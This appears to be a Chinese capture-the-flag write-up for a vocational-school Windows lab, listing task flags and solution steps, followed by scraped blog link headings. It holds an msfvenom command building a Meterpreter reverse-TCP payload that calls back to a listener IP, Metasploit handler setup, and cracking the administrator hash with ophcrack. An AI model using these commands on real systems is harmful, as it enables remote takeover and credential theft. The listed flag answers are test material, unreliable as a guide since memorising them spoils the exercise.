中职组安全-win20230217-环境-解析

*任务说明:

仅能获取win20230217的IP地址

用户名:test,密码:123456

  1. 访问服务器主机,找到主机中管理员名称,将管理员名称作为Flag值提交;

john

  1. 访问服务器主机,找到主机中补丁信息,将补丁编号作为Flag值提交;

KB4500331

查看方法如下:打开"开始"菜单。

单击"控制面板"

打开"添加删除程序"。

在弹出来的窗口左上角有"查看已安装的更新"选项。

3·访问服务器主机,找到主机中管理员密码,将管理员密码作为Flag值提交;

Goodluck

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.100.100.119 LPORT=4444 -b"\x00" -f exe > aiyou.exe将驱动开启就可以传文件到靶机运行

1、启动Metasploit,use exploit/multi/handler

2、设置payload,set payload windows/meterpreter/reverse_tcp

3、设置监听,set lhost ip

4、设置监听端口,set lport 4444

将John的hash弄到ophcrack密码出来了

4·访问服务器主机,找到主机中管理员桌面下文本文档信息,将文本文档名称作为Flag值提交;

ruK97azZp4

5·访问服务器主机,找到主机中管理员桌面下文本文档信息,将文本文档中信息作为Flag值提交;

rdO35NBXXi

6·访问服务器主机,找到主机中回收站唯一信息,将信息中的内容作为Flag值提交。

VX1DUEv95s

修改administrator的密码,登录进去回收站查看

相关推荐
金士镧(厦门)新材料有限公司4 小时前
如何让PVC制品更安全?稀土抑烟剂助力安全防护
科技·安全·全文检索
云飞云共享云桌面8 小时前
三维设计办公资源如何共享集中和安全管控?
运维·服务器·数据库·安全·自动化·制造
EkihzniY8 小时前
配合式活体检测:让身份核验安全又便捷
安全
熙客9 小时前
使用springsecurity+mybatis+mysql是如何实现JWT登陆
安全·安全架构
TH888610 小时前
水陆安全监测仪:水域陆域的“安全哨兵”
安全
llxxyy卢12 小时前
SQL注入之SQLMAP绕过WAF(安全狗)
服务器·安全
红树林0712 小时前
渗透测试之json_web_token(JWT)
网络协议·安全·web安全
云动雨颤13 小时前
网站被劫持后怎么恢复?
安全·dns
m0_7381207214 小时前
内网横向靶场——记录一次横向渗透(三)
开发语言·网络·安全·web安全·网络安全·php
codervibe16 小时前
协议欺骗工程实践:HTTP/FTP/Telnet/SSH 的伪装与实现要点
安全